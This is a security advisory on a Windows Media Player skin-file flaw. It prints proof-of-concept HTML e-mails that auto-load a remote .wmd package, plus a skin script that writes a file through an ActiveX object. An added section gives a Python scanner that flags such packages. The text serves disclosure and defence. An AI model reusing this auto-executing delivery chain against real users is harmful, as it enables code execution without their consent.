GFI has recently discovered a security flaw in Windows Media Player which allows a malicious user to run arbitrary code on a target machine when that machine views a website or an HTML e-mail. This vulnerability was previously discussed in our article:
Windows 2000 .ASX and .WMS buffer overrun (Exploit and Patch available).
Exploit code is now available to test for this problem.
Credit:
The information has been provided by Sandro Gauci of GFI.
Vulnerable systems:
Windows 95/98/ME (WMP7 is installed by default)
Windows NT
Windows 2000
The vulnerability can be exploited by embedding a JavaScript (.js) file within a Media Player skin file (.wmz), which in turn can be embedded in a Windows Media Download file (.wmd). The user does not need to open any attachment: the Media Player file can be launched automatically by an IFRAME tag, or by a window.open() call inside a <script> tag.
Exploit:
<Embedded within an HTML file or e-mail>
E-mail Example 1.
<html>
<head>
<script language="JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
alert('This exploit will now open a new window\nand automatically download the wmd file\nand execute it. This will create a file named\ngfiseclab.txt in your C:\\');
window.open(theURL,winName,features);
}
//-->
</script>
</head>
<body bgcolor="#FFFFFF"
onLoad="MM_openBrWindow('http://website/test.wmd','','width=0,height=0')">
</body>
</html>
</Embedded within an HTML e-mail>
E-mail Example 2.
<html>
<body>
<script>
alert('This exploit will now open a new window\nand automatically download the wmd file\nand execute it. This will create a file named\ngfiseclab.txt in your C:\\');
</script>
<iframe src="http://website/test.wmd"></iframe>
</body>
</html>
-------------------------------------
test.wmd is a compressed zip file that contains the following files:
* test.asx: meta file which points to an mpg file and the exploit skin file
* test.mpg: an example mpeg movie.
* test.wmz: the exploit skin file.
test.wmz is also a compressed zip file containing:
* test.js: our JavaScript, which contains the following code
************************************
var fso, f1;
// Proof of concept: instantiate the FileSystemObject ActiveX control from
// the skin script and write a marker file to C:\. This shows that the skin
// script can create ActiveX objects and write to disk, i.e. run code on
// the target machine.
fso = new ActiveXObject("Scripting.FileSystemObject");
f1 = fso.CreateTextFile("C:\\gfiseclab.txt", true);
// onload is invoked by the player once the skin is loaded; the file has
// already been written by then. playAgain() is not defined in the listing
// as published.
function onload(){
playAgain();
}
************************************
* test.wms: another metafile, which calls test.js
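As an added example (not part of GFI's advisory or exploit package), the following Python script walks a .wmd or .wmz package, both of which are zip archives according to the listing above, and flags the members that make such a package dangerous: an embedded .js script, a script that instantiates an ActiveX object, and a .wms or .asx metafile that references a script or a nested skin package. The sample package it builds in memory is constructed here to mirror the layout of test.wmd; its metafile contents are placeholders, not the real ASX/WMS schema and not GFI's files.

```python
import io
import zipfile

# File types named in the advisory. Both .wmd and .wmz are zip archives;
# .wms and .asx are text metafiles; .js is the script that actually runs.
SCRIPT_EXTENSIONS = (".js",)
METAFILE_EXTENSIONS = (".wms", ".asx")
PACKAGE_EXTENSIONS = (".wmz", ".wmd")
MAX_NESTING = 3  # stop recursing into archives nested deeper than this


def inspect_package(data, prefix="", depth=0):
    """Return a list of (member_path, finding) tuples for every member of a
    .wmd/.wmz archive that matches the exploit pattern, descending into
    nested archives. An empty list means nothing suspicious was found."""
    if depth > MAX_NESTING:
        return [(prefix, "archive nested too deeply")]
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [(prefix or "<root>", "not a zip archive")]

    findings = []
    with archive:
        for info in archive.infolist():
            path = prefix + info.filename
            lower = info.filename.lower()
            content = archive.read(info)

            if lower.endswith(SCRIPT_EXTENSIONS):
                findings.append((path, "embedded script"))
                if b"activexobject" in content.lower():
                    findings.append((path, "script instantiates ActiveX object"))
            elif lower.endswith(METAFILE_EXTENSIONS):
                # Metafiles are text; look for references to a script or to
                # a skin package that could carry one.
                text = content.decode("latin-1").lower()
                if ".js" in text:
                    findings.append((path, "metafile references a script"))
                if ".wmz" in text:
                    findings.append((path, "metafile references a skin package"))
            elif lower.endswith(PACKAGE_EXTENSIONS):
                findings.extend(inspect_package(content, path + "/", depth + 1))
    return findings


def _zip_bytes(members):
    """Build a zip archive in memory from a {name: bytes_or_str} mapping."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, body in members.items():
            z.writestr(name, body)
    return buf.getvalue()


def build_sample_wmd():
    """Constructed sample laid out like the advisory's test.wmd. The member
    bodies are placeholders (not GFI's files, not a real ASX/WMS schema)."""
    skin = _zip_bytes({
        "test.js": 'var fso = new ActiveXObject("Scripting.FileSystemObject");\n',
        "test.wms": "<!-- placeholder skin metafile --> scriptFile=test.js\n",
    })
    return _zip_bytes({
        "test.asx": "<!-- placeholder --> test.mpg test.wmz\n",
        "test.mpg": b"\x00\x00\x01\xba placeholder mpeg bytes",
        "test.wmz": skin,
    })


def build_benign_wmd():
    """Constructed download package carrying only a metafile and a movie."""
    return _zip_bytes({
        "test.asx": "<!-- placeholder --> test.mpg\n",
        "test.mpg": b"\x00\x00\x01\xba placeholder mpeg bytes",
    })


if __name__ == "__main__":
    for path, finding in inspect_package(build_sample_wmd()):
        print(f"{path}: {finding}")
```

Run against a real package, `inspect_package(open("test.wmd", "rb").read())` lists the embedded script and the metafiles that reach it; the nesting cap exists because a package may contain further packages and an attacker controls how deep that goes.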
Solution:
See: Windows 2000 .ASX and .WMS buffer overrun (Exploit and Patch available).